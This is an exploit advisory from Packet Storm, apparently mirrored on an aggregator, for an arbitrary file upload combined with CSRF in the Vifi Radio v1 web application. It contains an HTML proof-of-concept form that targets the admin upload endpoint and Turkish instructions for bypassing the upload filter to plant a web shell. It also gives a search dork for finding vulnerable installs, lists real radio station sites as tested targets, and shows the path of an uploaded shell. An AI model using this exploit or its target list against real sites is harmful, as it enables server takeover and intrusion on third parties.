Vifi Radio 1 Shell Upload / CSRF

🗓️ 22 Aug 2015 00:00:00Reported by KnocKoutType

packetstorm🔗 packetstormsecurity.com👁 24 Views

Vifi Radio v1 Shell Upload / CSRF Vulnerabilit

` .__ _____ _______   
| |__ / | |___ __\ _ \_______ ____   
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \  
| Y \/ ^ /> <\ \_/ \ | \/\ ___/  
|___| /\____ |/__/\_ \\_____ /__| \___ >  
\/ |__| \/ \/ \/  
_____________________________   
/ _____/\_ _____/\_ ___ \  
\_____ \ | __)_ / \ \/ http://h4x0resec.blogspot.com  
/ \ | \\ \____  
/_______ //_______ / \______ /  
\/ \/ \/   
Vifi Radio v1 - Arbitrary File Upload Vulnerability with CSRF  
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
[+] Discovered by: KnocKout  
[~] Contact : [email protected]  
[~] HomePage : http://h4x0resec.blogspot.com / http://milw00rm.com  
[~] Greetz: BARCOD3, ZoRLu, b3mb4m, _UnDeRTaKeR_, DaiMon, VoLqaN, EthicalHacker,  
Oguz Dokumaci ( d4rkvisuaL ) Septemb0x, KedAns-Dz, indushka, Kalashinkov  
############################################################  
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
|~Web App. : Vifi Radio  
|~Affected Version : v1  
|~Software : http://scriptim.org/market-item/vifi-v1-radyo-scripti/ & http://vifibilisim.com/scriptlerimiz-29-Radyo_Siteleri_Icin_Script.html   
|~Official Demo : http://radyo.vifibilisim.com  
|~RISK : Medium  
|~DORK : inurl:index.asp?radyo=2  
|~Tested On : [L] Windows 7, Mozilla Firefox  
########################################################  
Tested on;  
http://radyo.vifibilisim.com  
www.radyoimza.com  
www.bayraklifm.com  
www.istanbulfm.net  
www.gaziantepfurkanradyo.com  
http://iskenderunfm.com  
----------------------------------------------------------  
BİLGİ :   
Scriptte daha önce keşfedilmiş olan CSRF Zaafiyeti Kullanarak Admin Şifresi değiştirilir ve panele giriş yapılır.  
Aşağıda verilen PoC kodlar, "Tamper Data" Eşliğinde Upload süzgecini bypass etmek için kullanıldığında zararlı yazılım doğrudan sunucuya yüklenebilir.  
Yüklenen Shell Dosyasının sunucudaki yerini "Tamper Data" zaten iletim esnasında yakalayacaktır.  
Alternatif olarak "Anasayfa" üzerinde aşağıda yer alan "Djler" bölümünden shell dosyasının izi sürülebilir.  
  
Example : http://radyo.vifibilisim.com/yonetim/djler/2082015121530.php  
  
----------------------------------------------------------  
Upload.HTML  
-----------------------------------------------------------  
  
<td width="796" valign="top"><form name="form1" method="post" action="http://[TARGET]/yonetim/djtek_yukle.asp?upload=true&haber=56" enctype="multipart/form-data" onSubmit="checkFileUpload(this,'GIF,JPG,JPEG,BMP,PNG');return document.MM_returnValue">  
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">  
<tr>  
<td class="baslik"> CSRF with Tamper Data Shell Upload PoC </td>  
</tr> <tr>  
<td height="125" align="center" class="menu"><input type="file" name="fmfile" style="width:200px" class="main">  
<input name="fmsubmit" type="submit" class="main" value="Y&Uuml;KLE" /></td>  
  
</tr>  
</table>  
</form></td>  
</tr>  
</table></td>  
</tr>  
  
############################  
"Admin Panel: /yonetim "  
############################  
`

22 Aug 2015 00:00Current

0.2Low risk

Vulners AI Score0.2